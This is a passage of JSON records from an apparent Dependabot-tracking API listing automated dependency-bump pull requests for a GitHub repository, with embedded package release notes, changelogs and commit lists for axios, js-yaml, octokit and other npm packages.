(2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/...\n\n_Description has been truncated_","html_url":"https://github.com/SherfeyInv/updater-action/pull/39","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/SherfeyInv%2Fupdater-action/issues/39","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/39/packages"},{"uuid":"4231349573","node_id":"PR_kwDONns3ec7RF0Om","number":38,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 29 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-09T10:12:31.000Z","updated_at":"2026-04-09T10:12:43.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":29,"packages":[{"name":"axios","old_version":"0.23.0","new_version":"1.13.5","repository_url":"https://github.com/axios/axios"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"node-forge","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"@babel/traverse","old_version":"7.14.2","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"body-parser","old_version":"1.19.0","new_version":"1.20.4","repository_url":"https://github.com/expressjs/body-parser"},{"name":"express","old_version":"4.17.1","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"diff","old_version":"4.0.2","new_version":"4.0.4","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.1.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"got","old_version":"9.6.0","new_version":"removed","repository_url":"https://github.com/sindresorhus/got"},{"name":"json5","old_version":"1.0.1","new_version":"1.0.2","repository_url":"https://github.com/json5/json5"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar-fs","old_version":"2.0.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 19 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `0.23.0` | `1.13.5` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.0` | `1.4.0` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.14.2` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [body-parser](https://github.com/expressjs/body-parser) | `1.19.0` | `1.20.4` |\n| [express](https://github.com/expressjs/express) | `4.17.1` | `4.22.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.1.1` | `3.4.2` |\n| [got](https://github.com/sindresorhus/got) | `9.6.0` | `removed` |\n| [json5](https://github.com/json5/json5) | `1.0.1` | `1.0.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.0.1` | `2.1.4` |\n\n\nUpdates `axios` from 0.23.0 to 1.13.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.13.5\u003c/h2\u003e\n\u003ch2\u003eRelease 1.13.5\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eSecurity:\u003c/strong\u003e Fixed a potential \u003cstrong\u003eDenial of Service\u003c/strong\u003e issue involving the \u003ccode\u003e__proto__\u003c/code\u003e key in \u003ccode\u003emergeConfig\u003c/code\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7369\"\u003e#7369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBug fix:\u003c/strong\u003e Resolved an issue where \u003ccode\u003eAxiosError\u003c/code\u003e could be missing the \u003ccode\u003estatus\u003c/code\u003e field on and after \u003cstrong\u003ev1.13.3\u003c/strong\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7368\"\u003e#7368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanges\u003c/h3\u003e\n\u003ch4\u003eSecurity\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eFix Denial of Service via \u003ccode\u003e__proto__\u003c/code\u003e key in \u003ccode\u003emergeConfig\u003c/code\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7369\"\u003e#7369\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eFix/5657. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7313\"\u003e#7313\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure \u003ccode\u003estatus\u003c/code\u003e is present in \u003ccode\u003eAxiosError\u003c/code\u003e on and after v1.13.3. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7368\"\u003e#7368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFeatures / Improvements\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd input validation to \u003ccode\u003eisAbsoluteURL\u003c/code\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7326\"\u003e#7326\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRefactor: bump minor package versions. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7356\"\u003e#7356\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDocumentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eClarify object-check comment. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7323\"\u003e#7323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix deprecated \u003ccode\u003eBuffer\u003c/code\u003e constructor usage and README formatting. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7371\"\u003e#7371\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCI / Maintenance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eChore: fix issues with YAML. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7355\"\u003e#7355\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCI: update workflow YAMLs. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7372\"\u003e#7372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCI: fix run condition. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7373\"\u003e#7373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDev deps: bump \u003ccode\u003ekarma-sourcemap-loader\u003c/code\u003e from 0.3.8 to 0.4.0. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7360\"\u003e#7360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChore(release): prepare release 1.13.5. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7379\"\u003e#7379\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNew Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sachin11063\"\u003e\u003ccode\u003e@​sachin11063\u003c/code\u003e\u003c/a\u003e (first contribution — PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7323\"\u003e#7323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/asmitha-16\"\u003e\u003ccode\u003e@​asmitha-16\u003c/code\u003e\u003c/a\u003e (first contribution — PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7326\"\u003e#7326\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/axios/axios/compare/v1.13.4...v1.13.5\"\u003ehttps://github.com/axios/axios/compare/v1.13.4...v1.13.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.13.4\u003c/h2\u003e\n\u003ch2\u003eOverview\u003c/h2\u003e\n\u003cp\u003eThe release addresses issues discovered in v1.13.3 and includes significant CI/CD improvements.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/axios/axios/compare/v1.13.3...v1.13.4\"\u003ev1.13.3...v1.13.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eWhat's New in v1.13.4\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003efix: issues with version 1.13.3\u003c/strong\u003e (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7352\"\u003e#7352\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/ee90dfc28abffbb61e24974b2bd3139a4a40ac76\"\u003eee90dfc\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eFixed issues discovered in v1.13.3 release\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/29f75425f0c9f73021f5eedc869c176e30e05fe7\"\u003e\u003ccode\u003e29f7542\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.13.5 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7379\"\u003e#7379\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/431c3a361490a2e3d5ac5d9e08d66d4bb5f3cd2a\"\u003e\u003ccode\u003e431c3a3\u003c/code\u003e\u003c/a\u003e ci: fix run condition (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7373\"\u003e#7373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/9ff3a78ad72ecd665a4b673686f1517d824284bf\"\u003e\u003ccode\u003e9ff3a78\u003c/code\u003e\u003c/a\u003e ci: update ymls (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7372\"\u003e#7372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/265b71234c20fabbd6d691858c65a7e9c978659f\"\u003e\u003ccode\u003e265b712\u003c/code\u003e\u003c/a\u003e docs: fix deprecated Buffer constructor and formatting issues in README (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7371\"\u003e#7371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/475e75a260668d227aec9f77735a49748c9041ff\"\u003e\u003ccode\u003e475e75a\u003c/code\u003e\u003c/a\u003e feat: add input validation to isAbsoluteURL (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7326\"\u003e#7326\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\"\u003e\u003ccode\u003e28c7215\u003c/code\u003e\u003c/a\u003e fix: Denial of Service via \u003cstrong\u003eproto\u003c/strong\u003e Key in mergeConfig (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7369\"\u003e#7369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/04cf01969ed58f96920da032f340bfe4614aab90\"\u003e\u003ccode\u003e04cf019\u003c/code\u003e\u003c/a\u003e docs: clarify object check comment (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7323\"\u003e#7323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/696fa753c5366afbd21859c294c64c9ff2b359ab\"\u003e\u003ccode\u003e696fa75\u003c/code\u003e\u003c/a\u003e fix: status is missing in AxiosError on and after v1.13.3 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7368\"\u003e#7368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/569f028a5878faaec8d7d138ba686aac407bda4c\"\u003e\u003ccode\u003e569f028\u003c/code\u003e\u003c/a\u003e fix: added a option to choose between legacy and the new request/response int...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/44b7c9f0c4900fd8784f18e871199402f07fc69f\"\u003e\u003ccode\u003e44b7c9f\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump karma-sourcemap-loader (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7360\"\u003e#7360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.23.0...v1.13.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca 